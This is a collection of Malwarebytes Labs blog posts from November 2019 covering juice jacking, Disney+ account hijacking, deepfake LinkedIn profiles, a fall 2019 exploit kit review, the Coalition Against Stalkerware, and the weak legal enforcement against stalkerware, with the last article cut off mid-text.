“You should not trust public kiosks with your smart phone. Information can be retrieved or downloaded without your consent. Luckily for you, this station has taken the ethical route and your data is safe. Enjoy the free charge!”

As peak holiday travel season approaches, officials have issued public warnings about charging phones via USB using public charging stations in airports and hotels, as well as pluggable USB wall chargers, which are portable charging devices that can be plugged into an AC socket. However, this attack method has not been documented in the wild, outside of a few unconfirmed reports on the east coast and in the Washington, DC, area.

Instead of worrying about juice jacking this holiday season, we recommend you follow our guidance on best cybersecurity practices while traveling. We’ve also written articles on how to protect your Android, as well as how to protect your iOS phone.

Still, it’s best to be aware of potential modes of cyberattack—you never know what will trigger the transformation of the hypothetical to the real. To avoid inadvertently infecting your mobile device while charging your phone in public, learn more about how these attacks could happen and what you can do to prevent them.

How would juice jacking work?

As you may have noticed, when you charge your phone through the USB port of your computer or laptop, this also opens up the option to move files back and forth between the two systems. That’s because a USB port is not simply a power socket. A regular USB connector has five pins, where only one is needed to charge the receiving end. Two of the others are used by default for data transfers.

USB connection table courtesy of Sunrom

Unless you have made changes in your settings, the data transfer mode is disabled by default, except on devices running older Android versions. The connection is only visible on the end that provides the power, which in the case of juice jacking is typically not the device owner. That means, anytime a user connects to a USB port for a charge, they could also be opening up a pathway to move data between devices—a capability threat actors could abuse to steal data or install malware.

Types of juice jacking

There are two ways juice jacking could work:

  • Data theft: During the charge, data is stolen from the connected device.
  • Malware installation: As soon as the connection is established, malware is dropped on the connected device. The malware remains on the device until it is detected and removed by the user.
Data theft

In the first type of juice-jacking attack, cybercriminals could steal any and all data from mobile devices connected to charging stations through their USB ports. But there’s no hoodie-wearing hacker sitting behind the controls of the kiosk. So how would they get all your data from your phone to the charging station to their own servers? And if you charge for only a couple minutes, does that save you from losing everything?

Make no mistake, data theft can be fully automated. A cybercriminal could breach an unsecured kiosk using malware, then drop an additional payload that steals information from connected devices. There are crawlers that can search your phone for personally identifiable information (PII), account credentials, banking-related or credit card data in seconds. There are also many malicious apps that can clone all of one phone’s data to another phone, using a Windows or Mac computer as a middleman. So, if that’s what hiding on the other end of the USB port, a threat actor could get all they need to impersonate you.

Cybercriminals are not necessarily targeting specific, high-profile users for data theft, either—though a threat actor would be extremely happy (and lucky) to fool a potential executive or government target into using a rigged charging station. However, the chances of that happening are rather slim. Instead, hackers know that our mobile devices store a lot of PII, which can be sold on the dark web for profit or re-used in social engineering campaigns.

Malware installation

The second type of juice-jacking attack would involve installing malware onto a user’s device through the same USB connection. This time, data theft isn’t always the end goal, though it often takes place in the service of other criminal activities. If threat actors were to steal data through malware installed on a mobile device, it wouldn’t happen upon USB connection but instead take place over time. This way, hackers could gather more and varied data, such as GPS locations, purchases made, social media interactions, photos, call logs, and other ongoing processes.

There are many categories of malware that cybercriminals could install through juice jacking, including adware, cryptominers, ransomware, spyware, or Trojans. In fact, Android malware nowadays is as versatile as malware aimed at Windows systems. While cryptominers mine a mobile phone’s CPU/GPU for cryptocurrency and drain its battery, ransomware freezes devices or encrypts files for ransom. Spyware allows for longterm monitoring and tracking of a target, and Trojans can hide in the background and serve up any number of other infections at will.

Many of today’s malware families are designed to hide from sight, so it’s possible users could be infected for a long time and not know it. Symptoms of a mobile phone infection include a quickly-draining battery life, random icons appearing on your screen of apps you didn’t download, advertisements popping up in browsers or notification centers, or an unusually large cell phone bill. But sometimes infections leave no trace at all, which means prevention is all the more important.


The first and most obvious way to avoid juice jacking is to stay away from public charging stations or portable wall chargers. Don’t let the panic of an almost drained battery get the best of you. I’m probably showing my age here, but I can keep going without my phone for hours. I’d rather not see the latest kitty meme if it means compromising the data on my phone.

If going without a phone is crazy talk and a battery charge is necessary to get you through the next leg of your travels, using a good old-fashioned AC socket (plug and outlet) will do the trick. No data transfer can take place while you charge—though it may be hard to find an empty outlet. While traveling, make sure you have the correct adapter for the various power outlet systems along your route. Note there are 15 major types of electrical outlet plugs in use today around the globe.

Other non-USB options include external batteries, wireless charging stations, and power banks, which are devices that can be charged to hold enough power for several recharges of your phone. Depending on the type and brand of power bank, they can hold between two and eight full charges. Power banks with a high capacity are known to cost more than US$100, but offer the option to charge multiple devices without having to look for a suitable power outlet.

If you still want the option to connect via USB, USB condoms are adaptors that allow the power transfer but don’t connect the data transfer pins. You can attach them to your charging cable as an “always on” protection.

Image courtesy of

Using such a USB data blocker or “juice-jack defender” as they are sometimes called will always prevent accidental data exchange when your device is plugged into another device with a USB cable. This makes it a welcome travel companion, and will only set you back US$10–$20.

Checking your phones’ USB preference settings may help, but it’s not a fool-proof solution. There have been cases where data transfers took place despite the “no data transfer” setting.

Finally, avoid using any charging cables and power banks that seem to be left behind. You can compare this trick to the “lost USB stick” in the parking lot. You know you shouldn’t connect those to your computer, right? Consider any random technology left behind as suspect. Your phone will thank you for it.

Stay safe, everyone!

The post Explained: juice jacking appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Disney+ security and service issues: Here’s what we know so far

Malwarebytes - Wed, 11/20/2019 - 18:11

The long wait is over.

Disney+, the new video-streaming service to rival Netflix and Amazon Prime, debuted last week to much fanfare, racking up 10 million subscribers within a single day of launch. Unfortunately, it wasn’t the kind of splash the majority of users predicted, as they were met with connection and performance issues out the gate—soon to be followed by reports of hacked accounts being stolen and sold on the dark web.

The Disney+ problem trend line, outage heat map, and most reported problems, according to Downdetector. A snapshot of some of the hitches users are encountering (Courtesy of Downdetector Australia)

Disney+, on the other hand, didn’t expect to be overwhelmed with technical complications due to exceedingly high consumer demand. Nor do they admit to suffering a data breach, despite user complaints of being frozen out of their accounts or seeing their credentials changed without approval.

Things continue to unfold as we speak, but here’s what we currently know about the Disney+ security issues.

Disney+ user credentials in the dark web

For as low as US$3, interested buyers lurking on the dark web can acquire a trove of stolen Disney+ accounts, which popped up in several underground markets mere hours after launch last week. According to an investigation conducted by Catalin Cimpanu of ZDNet, “Hacking forums have been flooded with Disney+ accounts, with ads offering access to thousands of account credentials.” They also saw hacked accounts being offered for free use and for sharing.

The pitch to free Disney+ accounts (Courtesy of ZDNet)

The BBC, with the help of an unnamed cybersecurity researcher, further confirmed the sale of thousands of Disney+ accounts.

No smoking gun…yet

As of presstime, Disney denies that there was a data breach of its streaming platform, and no one has pointed to a root cause on how Disney+ accounts were hacked. However, there are smart speculations.

Users with hacked accounts may have used recycled credentials. And this won’t be a surprise if it’s true. According to a Google survey, two in three Internet users reuse their passwords—some for multiple accounts, some for all of them.

Armed with leaked credentials from multiple data breaches, hackers likely used credential stuffing—the automated entering of compromised username-password combinations to target account forms, which in this case were from Disney+. This works under the assumption that users entered the exact combo in that service.

Disney+ also allows for password sharing, but its user interface doesn’t include an option to easily log others out from account access. In addition, it doesn’t require two-factor authentication, a security measure that could have prevented recycled credentials from being an issue.

Read: Are hackers gonna hack anymore? Not if we keep reusing passwords

Hackers may have guessed user passwords correctly. Another method hackers can use is password guessing. It seems silly, but this works, too, because many users are still so bad at making strong passwords and opt for easy-to-remember ones like “12345,” “password,” and “qwerty.” Add in the difficulty of entering complex passwords via TV remote, and that makes this scenario even more plausible.

ZDNet noted, however, that even consumers who used unique passwords claimed their accounts were stolen. In that case, it is possible that…

Disney+ really was hacked or their user database leaked online. Not all companies fess up to being hacked right away, especially if they are in the middle of investigating the culprit/root cause. In addition, Disney has a documented history of cutting corners on investing in technology infrastructure. It’s possible their databases were not properly secured and credentials actually leaked online, allowing threat actors to simply grab the information they needed without having to breach at all.

Users may actually have malware on their systems. It’s not a long shot, considering we have nasties like spyware and keyloggers in the wild. So many houses are Internet-connected through streaming services and other IoT devices, such as home assistants, thermostats, doorbell, security, and lock systems. These networked devices are notoriously vulnerable to attack.

Users may have been phished. Although there are no reports of an active phishing campaign against Disney+ users, we have seen a well-timed, professionally put-together phishing email fool even the cleverest of Internet users.

A Disney+ account lockdown is a security precaution

There are user complaints on social media wherein they claim to have been locked out of the Disney+ service. While this may suggest that hackers have successfully changed linked emails and passwords to affected accounts, it could also suggest that a security precaution Disney had put in place is working: When their system sees suspicious activity on an account during the login process, it locks that account down.

Of course, until Disney customer service confirms this to be true for affected users, we can only assume that finding yourself locked out is the streaming service’s way of protecting your account from getting compromised. Unfortunately, Disney made the mistake of linking its new streaming service with the rest of its platforms, freezing some users out of their other Disney services as well.

At the end of the day, there’s good news

There is big room for improvement, for both the users and Disney+.

Users should take this incident as a reminder of the importance of good password hygiene, such as creating unique and complex credentials and never reusing them. Chances are, online criminals already have some of your old passwords in their stash, so why continue to use them?

Heed what others have already advised and start using a password manager. There are a lot of options out there, so take your time and make sure you pick the one you think is for you. Because Disney+ doesn’t have another layer of account protection in place, such as two-factor authentication (2FA), it is more crucial than ever to use a randomly generated, long password that you don’t have to memorize.

Speaking of passwords, it’s also good practice to avoid sharing them with anyone, including friends and family members. Yes, Disney tolerates the practice of password sharing, but for security’s sake, it’s best not to. At the very least, consider introducing a little bit of friction in keeping your accounts secure. And this is true not just for Disney+ account holders.

There is no shortage of great suggestions for Disney+ to increase its security, too. Apart from implementing and mandating the use of 2FA (especially for linked Walt Disney accounts), the streaming service should also have provided a feature where a user can view other devices connected to their Disney+ account. Some also suggest that, since Disney also owns Hulu, Disney+ should have a feature that allows account holders to log everyone out in the event of a hack.

Disney+ is set to roll out in European countries and the UK in March 2020. Hopefully by that time, both users and Disney will have done more to ensure their accounts are secured, beefier protections are enabled, and performance issues are ironed out.

The post Disney+ security and service issues: Here’s what we know so far appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Deepfakes and LinkedIn: malign interference campaigns

Malwarebytes - Wed, 11/20/2019 - 16:00

Deepfakes haven’t quite lost the power to surprise, but given their wholesale media saturation in the last year or so, there’s a sneaking suspicion in some quarters that they may have missed the bus. When people throw a fake Boris Johnson or Jeremy Corbyn online these days, the response seems to be fairly split between “Wow, that’s funny” and barely even amused.

You may well be more likely to chuckle at people thinking popular Boston Dynamics spoof “Bosstown Dynamics” videos are real—but that’s exactly what cybercriminals are banking on, and where the real malicious potential of deepfakes may lie.

What happens when a perfectly ordinary LinkedIn profile features a deepfake-generated image of a person who doesn’t exist? Everyone believes the lie.

Is the sky falling? Probably not.

The two main markets cornered by deepfakes at time of writing are fake pornography clips and a growing industry in digital effects, which are a reasonable imitation of low budget TV movies. In some cases, a homegrown effort has come along and fixed a botched Hollywood attempt at CGI wizardry. Somehow, in an age of awful people paying for nude deepfakes of anyone they choose, and the possibility of oft-promised but still not materialised political shenanigans, the current ethical flashpoint is whether or not to bring James Dean back from the dead.

Despite this, the mashup of politics and technology continues to simmer away in the background. At this point, it is extremely unlikely you’ll see some sort of huge world event (or even several small but significant ones) being impacted by fake clips of world leaders talking crazy—they’ll be debunked almost instantly. That ship has sailed. That deepfakes came to prominense primarily via pornography subreddits and people sitting at home rather suggests they got the drop on anyone at a nation-state level.

When it comes to deepfakes, I’ve personally been of the “It’s bad, but in social engineering terms, it’s a lot of work for little gain” persuasion. I certainly don’t subscribe to the sky-is-about-to-cave-in model. The worst areas of deepfakery I tend to see are where it’s used as a basis to push Bitcoin scams. But that doesn’t mean there isn’t potential for worse.

LinkedIn, deepfakes, and malign influence campaigns

With this in mind, I was fascinated to see “The role of deepfakes in malign influence campaigns” published by StratCom in November, which primarily focused on the more reserved but potentially devastating form of deepfakes shenanigans. It’s not fake Trump, it isn’t pretend Boris Johnson declaring aliens are invading; it’s background noise level interference designed to work its silent way up a chain of command.

I was particularly taken by the comment that “Doom and gloom” assessments from experts had made way for a more moderate and skeptical approach. In other words, as the moment marketers, YouTube VFX fans, and others tried to pry deepfake tech away from pornography pushers, it became somewhat untenable to make big, splashy fakes with sinister intentions. Instead, the battle raged behind the scenes.

And that’s where Katie Jones stepped up to the plate.

Who is Katie Jones?

In the grand scheme of things, nobody. Another fake account in a never-ending wave of fake accounts stretching through years of Facebook clones and Myspace troll “baking sessions” where hundreds would be rolled out the door on the fly. The only key difference is that Katie’s LinkedIn profile picture was a computer-generated work of fiction.

The people “Katie” had connected to were a little inconsistent, but they did include an awful lot of people working in and around government, policy, academia, and…uh…a fridge freezer company. Not a bad Rolodex for international espionage.

Nobody admitted talking to Katie, though this raises the question of whether anyone who fell for the ruse would hold up their hand after the event.

While we can speculate on why the profile was created—social engineering campaign, test run for nation-state spying (quickly abandoned once discovered, similar to many malware scams), or even just some sort of practical joke—what really amuses me is the possibility that someone just randomly selected a face from a site like this and had no idea of the chaos that would follow.

Interview with a deepfake sleuth

Either way, here comes Munira Mustaffa, the counter-intelligence analyst who first discovered the LinkedIn deepfake sensation known as Katie. Mustafa took some time to explain to me how things played out:

A contact of mine, a well-known British expert on Russia defence and military, was immediately suspicious about an attempted LinkedIn connection. He scanned her profile, and reverse searched her profile photo, which turned up zero results. He turned to me to ask me to look into her, and I, too, found nothing.

This is unusual for someone claiming to be a Russia & Eurasia Fellow for an organisation like Center for Strategic and International Studies (CSIS), because you would expect someone in her role to have some publication history at least. The security world is a small one for us, especially if you’re a policy wonk working on Russia matters. We both already knew Katie Jones did not exist, and this suspicion was confirmed when he checked with CSIS.

I kept coming back to the photo. How could you have a shot like that but not have any sort of digital footprint? If it had been stolen from an online resource, it’d be almost impossible. At this point, I started to notice the abnormalities—you must understand my thought process as someone who does photography for a hobby and uses Photoshop a lot.

For one thing, there was a gaussian blur on her earlobe. Initially, I thought she’d Photoshopped her ear, but that didn’t check out. Why would someone Photoshop their earlobe? 

Once I started to notice the anomalies, it was like everything suddenly started to click into place right before my eyes. I started to notice the halo around her hair strands. How her eyes were not aligned. The odd striations and blurring. Then there were casts and artefacts in the background. To casual observers, they would look like bokeh. But if you have some experiences doing photography, you would know instantly they were not bokeh.

They looked pulled—like someone had played with the Liquify tool on Photoshop but dialed up the brush to extreme. I immediately realised that what I was looking at was not a Photoshopped photo of a woman. In fact, it was an almost seamless blending of one person digitally composited and superimposed from different elements.

I went on and started to generate my own deepfakes. After examining half a dozen or so, I started to picking out patterns and anomalies, and I went back to “Katie” to study it further. They were all present.

Does it really matter?

In some ways, possibly not. The only real benefit to using a deepfake profile pic is that suspicious people won’t get a result in Google reverse search, TinEye, or any other similar service. But anyone doing that for LinkedIn connections or other points of contact probably won’t be spilling the beans on anything they shouldn’t be anyway.

For everyone else, the risk is there and just enough to make it all convincing. It’s always been pretty easy to spot someone using stock photography model shots for bogus profile pics. The threat from deepfaked snapshots comes from their sheer, complete and utter ordinariness. Using all that processing power and technology to carve what essentially looks like a non-remarkable human almost sounds revolutionary in its mundaneness.

But ask any experienced social engineer, and they’ll tell you mundane sells. We believe the reality that we’re presented. You’re more likely to tailgate your way into a building dressed as an engineer, or carrying three boxes and a coffee cup, then dressed as a clown or wearing an astonishingly overt spycoat and novelty glasses.

Spotting a fake

Once you spend a little time looking at the fake people generated on sites such as this, there are multiple telltale signifiers that the image has been digitally constructed. We go back to Mustaffa:

Look for signs of tampering on the photo by starting with the background. If it appears to be somewhat neutral in appearance, then it’s time to look for odd noises/disturbances like streaky hair or earlobes.

I decided to fire up a site where you guess which of two faces is real and which is fake. In my first batch of shots, you’ll notice the noise/disturbance so common with AI-generated headshots—it resembles the kind of liquid-looking smear effect you’d get on old photographs you hadn’t developed properly. Check out the neck in the below picture:

On a similar note, look at the warping next to the computer-generated man’s hairline:

These effects also appear in backgrounds quite regularly. Look to the right of her ear:

Backgrounds are definitely a struggle for these images. Look at the bizarre furry effect running down the edge of this tree:

Sometimes the tech just can’t handle what it’s trying to do properly, and you end up with…whatever that’s supposed to be…on the right:

Also of note are the sharply-defined lines on faces around the eyes and cheeks. Not always a giveaway, but helpful to observe alongside other errors.

Remember in ye olden days when you’d crank up certain sliders in image editing tools like sharpness to the max and end up with effects similar to the one on this ear?

Small children tend to cause problems, and so too do things involving folds of skin, especially where trying to make a fake person look a certain age is concerned. Another telltale sign you’re dealing with a fake are small sets of incredibly straight vertical lines on or around the cheek or neck areas. Meanwhile, here are some entirely unconvincing baby folds:

There are edge cases, but in my most recent non-scientific test on Which face is real, I was able to guess correctly no fewer than 50 times in a row who was real before I got bored and gave up. I once won 50 games of Tekken in a row at a university bar and let me tell you, that was an awful lot more difficult. Either I’m some sort of unstoppable deepfake-detecting marvel, or it really is quite easy to spot them with a bit of practice.

Weeding out the fakers

Deepfakes, then, are definitely here to stay. I suspect they’ll continue to cause the most trouble in their familiar stomping grounds: fake porn clips of celebrities and paid clips of non celebrities that can also be used to threaten/blackmail victims. Occasionally, we’ll see another weightless robot turning on its human captors and some people will fall for it.

Elsewhere, in connected networking profile land, we’ll occasionally come across bogus profiles and then it’s down to us to make use of all that OPSEC/threat intel knowledge we’ve built up to scrutinize the kind of roles we’d expect to be targeted: government, policy, law enforcement, and the like.

We can’t get rid of them, and something else will be along soon enough to steal what thunder remains, but we absolutely shouldn’t fear them. Instead, to lessen their potential impact, we need to train ourselves to spot the ordinary from the real.

Thanks to Munira for her additional commentary.

The post Deepfakes and LinkedIn: malign interference campaigns appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Exploit kits: fall 2019 review

Malwarebytes - Tue, 11/19/2019 - 18:08

Despite a slim browser market share, Internet Explorer is still being exploited in fall 2019 in a number of drive-by download campaigns. Perhaps even more surprising, we’re seeing new exploit kits emerge.

Based on our telemetry, these drive-bys are happening worldwide (with the exception of a few that are geo-targeted) and are fueled by malvertising most often found on adult websites.

Even though the weaponized vulnerabilities remain fairly old, we’ve observed a growing number of exploit kits go for fileless attacks instead of the more traditional method of dropping a payload on disk. This is an interesting trend that makes sample sharing more difficult and possibly increases infection rates by evading some security products.

Fall 2019 overview
  • Spelevo EK
  • Fallout EK
  • Magnitude EK
  • RIG EK
  • GrandSoft EK
  • Underminer EK
  • KaiXin EK
  • Purplefox EK
  • Capesand EK

Internet Explorer’s CVE-2018-8174 and Flash Player’s CVE-2018-15982 are the most common vulnerabilities, while the older CVE-2018-4878 (Flash) is still used by some EKs. It’s worth noting we’re seeing some exploit kits no longer using Flash, while others are relying on much older vulnerabilities.

Spelevo EK

Spelevo EK is one of these newer exploit kits that we see on a regular basis via malvertising campaigns. There hasn’t been any major change since our last review and the threat actors still rely on the domain shadowing technique to generate new URLs.

Payloads seen: PsiXBot, Gootkit, Maze

Fallout EK

Fallout EK stands apart from the rest with obfuscation techniques, as well various fingerprinting checks. It also implemented the Diffie-Hellman key exchange to prevent offline replays by security analysts.

Payloads seen: Sodinokibi, AZORult, Kpot, Raccoon, Danabot

Magnitude EK

Magnitude EK hasn’t changed much in the past few months. The same Magnigate infrastructure is being used to redirect users to fake cryptocurrency domains. The payload remains Magniber ransomware delivered in fileless mode.

Payload seen: Magniber


Recently, RIG EK seems to have dropped its Flash Player exploit and instead relies solely on Internet Explorer. One active campaign is HookAds, which uses a fake gaming website to redirect to the exploit kit.

Payloads seen: Smoke Loader, Sodinokibi, Paradise, Antefrigus

GrandSoft EK

GrandSoft EK is not as commonly observed this fall, and appears to have limited payload distribution. It is known to focus on the distribution of the Ramnit Trojan.

Payload seen: Ramnit

Underminer EK

Underminer EK is one of the more interesting exploit kits on the market, due to its unusual way of delivering its Hidden Bee payload. Not only is it fileless, but it is packed in a particular way that hints that the exploit kit and malware developer are one and the same.

Payload seen: Hidden Bee

KaiXin EK

KaiXin EK is a more obscure exploit kit we seldom run into, perhaps because it seems to target the Asian market. However, it appears to still be around on the same infrastructure.

Payload seen: Dupzom

Purple Fox EK

Purple Fox was described previously by TrendMicro and is an interesting drive-by framework that loads fileless malware. While it was once loaded via RIG EK, it is now seen on its own. For this reason, we believe it can be called an exploit kit as well.

Payload seen: Kpot

Capesand EK

Capesand EK is the latest exploit to have surfaced although it is based on code from an old EK called Demon Hunter. It was spotted on a particular malvertising campaign, perhaps suggesting the work of one malware author for his own distribution.

Payload seen: NjRAT

Maintaining a foothold

It’s interesting to see exploit kits alive and kicking, despite relying on aging vulnerabilities and a decrease in user base of both Internet Explorer and the Flash Player.

In the past quarter, we’ve observed sustained malvertising activity and a diversity of malware payloads served. We can probably expect this trend to continue and perhaps even see new frameworks pop up. Even if it remains remote, we can’t discard the possibility of an exploit kit targeting one of the newer browsers.

Consumer and enterprise users still running Internet Explorer are protected from these exploit kits with Malwarebytes.

The post Exploit kits: fall 2019 review appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Malwarebytes teams up with security vendors and advocacy groups to launch Coalition Against Stalkerware

Malwarebytes - Tue, 11/19/2019 - 13:00

Today, Malwarebytes is announcing its participation in a joint effort to stop invasive digital surveillance: the Coalition Against Stalkerware.

For years, Malwarebytes has detected and warned users about the potentially dangerous capabilities of stalkerware, an invasive threat that can rob individuals of their expectation of, and right to, privacy. Just like the domestic abuse it can enable, stalkerware also proliferates away from public view, leaving its victims and survivors in isolation, unheard and unhelped.

The Coalition Against Stalkerware is the next necessary step in stopping this digital threat—a collaborative approach steered by the promise of enabling the safe use of technology for everyone, everywhere. The coalition includes representatives from cybersecurity vendors, domestic violence organizations, and the digital rights space.

Our coalition’s founding members are Malwarebytes, Avira, Kaspersky, G Data, Norton Lifelock, National Network to End Domestic Violence, Electronic Frontier Foundation, Operation Safe Escape, WEISSER Ring, and the European Network for the Work with Perpetrators of Domestic Violence. Martijn Grooten, editor of Virus Bulletin, is serving as a special advisor.

Already, the coalition has produced results.

In the past month, both Malwarebytes and Kaspersky shared research and intelligence on stalkerware with one another. This exchange has improved the detection rate for both our products, but more than that, it has improved the safety of users everywhere.

Further, coalition members have taken on the task of defining stalkerware and creating its detection criteria, crucial steps in empowering the cybersecurity industry to better understand this threat and how to fight it.

Finally, the coalition’s website,, includes information for domestic abuse survivors and advocates, including links to external resources, information about state laws, recent news articles, and survivors’ stories.

With this group, we are making a call to the broader cybersecurity industry: If you have ever made a promise to protect people, now is the time to uphold that promise. Stalkerware is a known, documented threat, and you can help stop it.

Join our fight. You’ll be in good company.

Our journey against invasive monitoring apps

In 2019, Malwarebytes began a recommitment to detecting and stopping apps that could invasively monitor users without their knowledge. These types of programs, which we classify as “monitor” or “spyware” in our product, can provide domestic abusers with a new avenue of control over their survivors’ lives, granting wrongful, unfettered access to text messages, phone calls, emails, GPS location data, and online browsing behavior.

In this effort, we’ve analyzed more than 2,500 samples of programs that had been flagged in research algorithms as potential monitoring/tracking apps or spyware. We grew our database of known monitoring/spying apps to include more than 100 applications that no other vendor detects and more than 10 that were, as of October 1, still on the Google Play Store.

Further, we’ve written multiple blogs for domestic abuse survivors and advocates on what to do if they have these types of apps on their phones, how to protect against them, and how organizations supporting victims of stalking can secure their data. In the summer, we also offered cybersecurity advice to domestic abuse advocates and survivors for the National Network to End Domestic Violence’s Technology Summit in San Francisco.

We are proud of our work, but we cannot ignore an important fact—it was not conducted in isolation.

Our blogs relied on the expertise of several domestic abuse advocates, along with the published work of researchers in intimate partner violence and digital rights. Our invitations to local community justice centers were as much about presenting as they were about learning. Our meetings with local law enforcement taught us about difficulties in collecting evidence of these invasive apps, and how domestic abusers can slip through the cracks of legal enforcement.

Every time we reached out, we learned more and we improved. With the Coalition Against Stalkerware, we hope to deepen these efforts.

The post Malwarebytes teams up with security vendors and advocacy groups to launch Coalition Against Stalkerware appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (November 11 – 17)

Malwarebytes - Mon, 11/18/2019 - 16:43

Last week on Malwarebytes Labs, we offered statistics and information on a sneaky new Trojan malware for Android, inspected a bevy of current Facebook scams, and explained the importance of securing food and agriculture infrastructure.

We also released our latest report on cybercrime tactics and techniques, offering new telemetry about the many cybersecurity threats facing the healthcare industry. You can read the full report here.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (November 11 – 17) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Stalkerware’s legal enforcement problem

Malwarebytes - Mon, 11/18/2019 - 15:47

Content warning: This piece contains brief descriptions of domestic violence and assault against women and children.

In the past five years, only two stalkerware developers, both of whom designed, marketed, and sold tools favored by domestic abusers to pry into victims’ private lives, have faced federal consequences for their actions. Following a guilty plea in court, one was ordered to pay $500,000, and his app was subsequently shut down. The other was ordered to change his apps if he wanted to keep selling them.

The dearth of meaningful legal enforcement against stalkerware makers extends to another realm—stalkerware users. Those who install stalkerware with the intent to monitor, control, harass, or otherwise abuse their victims typically get away with it, avoiding legal penalty even if there’s plenty of evidence to suggest their guilt.

To blame is a frustrating yet human struggle that includes low awareness, police mistrust, limited law enforcement resources, scant data, furtive advertising schemes, and a criminal justice system that must rely on currently-available statutes—some decades old—to bring charges against alleged criminals who utilize a modern, evolving cyberthreat.

This is stalkerware’s legal enforcement problem. The invasive cyberthreat can be installed on unsuspecting users’ mobile devices to gain access to their text messages, emails, call logs, browser activity, GPS location, and even their microphone and camera. It is entangled deeply in cases of stalking, harassment, and assault—then muddied by its relationship with cybercrime and technology abuse, two little-understood and vastly under-resourced areas of criminal justice.   

Erica Olsen, director of the Safety Net program at the National Network to End Domestic Violence (NNEDV), summed up the difficulties.

“There’s generally a lack of motivation on this issue and a consistent minimization of this type of abuse,” Olsen said. “That’s complicated further when the numbers on this type of abuse are hard to track, since many people are going the route of a factory reset or a new device, and because police either don’t have access to the forensic software to test, are unwilling to use it in these cases, or survivors don’t want to.”

She continued: “That can make it seem like this isn’t happening as much as it is.” 

Large problem, limited action

In October, the US Federal Trade Commission (FTC) became the latest government body to launch a new front against stalkerware.

Following an investigation into the company Retina-X Studios and its owner, James N. Johns Jr., the FTC said it found multiple violations of the Children’s Online Privacy Protection Act (COPPA) and the Federal Trade Commission Act, which prohibits businesses from deceiving their customers. The FTC’s consent agreement told a story of broken data security promises, repeated data breaches, user privacy invasions, and compromised device security.

Per the agreement with the FTC, Retina X and Johns Jr. can no longer develop, promote, or advertise their apps—PhoneSheriff, MobileSpy, and TeenSafe—unless significant changes are made to the apps’ designs and functionalities. The same restrictions apply to any stalkerware-type app that the company and its founder work on in the future. Because of limitations of the FTC Act, the FTC could not issue a fine to Retina-X and Johns Jr. on their first violation.

At the time of the settlement agreement, Electronic Frontier Foundation Cybersecurity Director Eva Galperin, a staunch advocate against stalkerware, told Business Insider: “I’ll take what I can get.”

The problem, Galperin said, is that the FTC’s settlement only precluded Retina-X and Johns Jr. from working on stalkerware apps that were not for “legitimate” purposes—an inherently flawed premise.

“There are simply no legitimate purposes for secret stalking apps,” Galperin wrote together with EFF Associate Director of Research Gennie Gebhart.

The FTC’s settlement represented a change in enforcement, though—it was the first federal action against a stalkerware maker in five years.

In 2014, the FBI indicted a man who allegedly conspired to sell and advertise the stalkerware app StealthGenie, which could, without a user’s consent, monitor their text messages and phone calls, and peer into their online browsing behavior. The man, who was then 31 years old, pleaded guilty to the charges and received a $500,000 fine. A US District Judge later permanently shut down StealthGenie’s operations.

When Malwarebytes reached out to the FBI to better understand how it is tracking stalkerware, a spokesperson said that the bureau’s Internet Crime Complaint Center, which receives complaints about app-related crimes, has not received many complaints about stalkerware itself. The spokesperson said that stalkerware could be part of complaints being made in other categories, though, like personal data breach or malware-related activities.

Though five years apart, the actions by the FBI and the FTC bear a striking similarity. The allegations against the two stalkerware developers dealt with the economics of stalkerware— selling, marketing, promoting, advertising.

Upon the FBI’s successful prosecution of StealthGenie’s owner, then-Assistant Attorney General Leslie Caldwell affirmed this focus:

“Make no mistake: Selling spyware is a federal crime, and the Criminal Division will make a federal case out if it.”

But sometimes, the federal crime of selling stalkerware is not enough to catch everyone who makes it, said NNEDV’s Olsen.

“If you look at the language and discussion of the Stealth Genie app conviction, it was all about the marketing and the product that they were selling,” Olsen said. Unfortunately, countless stalkerware developers have changed their marketing tactics to position their products as more “family-focused” parental monitoring apps, but with the exact same, non-consensual spying capabilities. These slapdash marketing changes make it difficult for government agencies to actually catch and stop stalkerware developers, Olsen said.

“That change in their marketing makes it harder to hold them accountable because they can claim they are not responsible for people misusing or manipulating their product, but that their product is not meant to be used for illegal activity,” Olsen said.

What to do, then, if developers have faced few consequences, and an easy escape route—retooled advertising—is readily available? Easy, Olsen said. Go after the criminal users.

“If they can’t go after them for that,” Olsen said, “then the accountability has to be on the person who knowingly misused it for a criminal purpose.”

Stalkerware’s illegal uses

The legal effort to stop stalkerware users is an uphill battle. Much of that is because stalkerware itself, and the ownership of it, is not a crime.

Instead, it is how stalkerware is usedthat could violate various state and federal laws. Unfortunately, many of its use cases are grim, tied often into cases of domestic violence, sexual harassment, and assault.

Danielle Citron, professor of law at Boston University School of Law, wrote about stalkerware-leveraged domestic violence in her 2015 paper “Spying Inc.

“A woman fled her abuser who was living in Kansas. Because her abuser had installed a cyber stalking app on her phone, her abuser knew that she had moved to Elgin, Illinois. He tracked her to a shelter and then a friend’s home where he assaulted her and tried to strangle her. In another case, a woman tried to escape her abusive husband, but because he had installed a stalking app on her phone, he was able to track down her and her children. The man murdered his two children. In 2013, a California man, using a spyware app, tracked a woman to her friend’s house and assaulted her.”

When stalkerware isn’t directly tied to violence, it can still be used in several ways that break multiple federal and state laws.

For example, a domestic abuser in California who uses stalkerware to record their partner’s phone calls without their knowledge could be violating California Penal Code 632(a), which forbids recording a phone conversation without all parties consenting, along with the federal Wiretap Act. A domestic abuser in New York who uses stalkerware to track a survivor’s movements through GPS tracking could be in violation of New York state’s “Jackie’s Law.” And a domestic abuser who jailbreaks someone’s phone to install stalkerware onto the device could be in violation of the federal Computer Fraud and Abuse Act, a broad law that WhatsApp has claimed was violated by the Israelia spyware maker NSO Group.

Quite obviously, though, stalkerware use is most often bundled into complaints of stalking, cyberstalking, and online harassment—statutes that cover a gamut of illegal behavior including intimidation, harassment, and bullying that happen in real life or online.

But even when the US government receives cases that outline these crimes, the actual, successful prosecution against the alleged criminals is rare, according to data obtained by ThinkProgress.

In 2017, ThinkProgress reported that the US Department of Justice frequently failed to prosecute cyberstalking and online harassment cases from 2012 to 2016. During that time period, US Attorneys’ offices prosecuted 321 cases of online harassment and stalking, which included 41 cases for cyberstalking. Of those 41 cases, 21 resulted in convictions.

The numbers betray the reported volume of cyberstalking that was happening at the time.
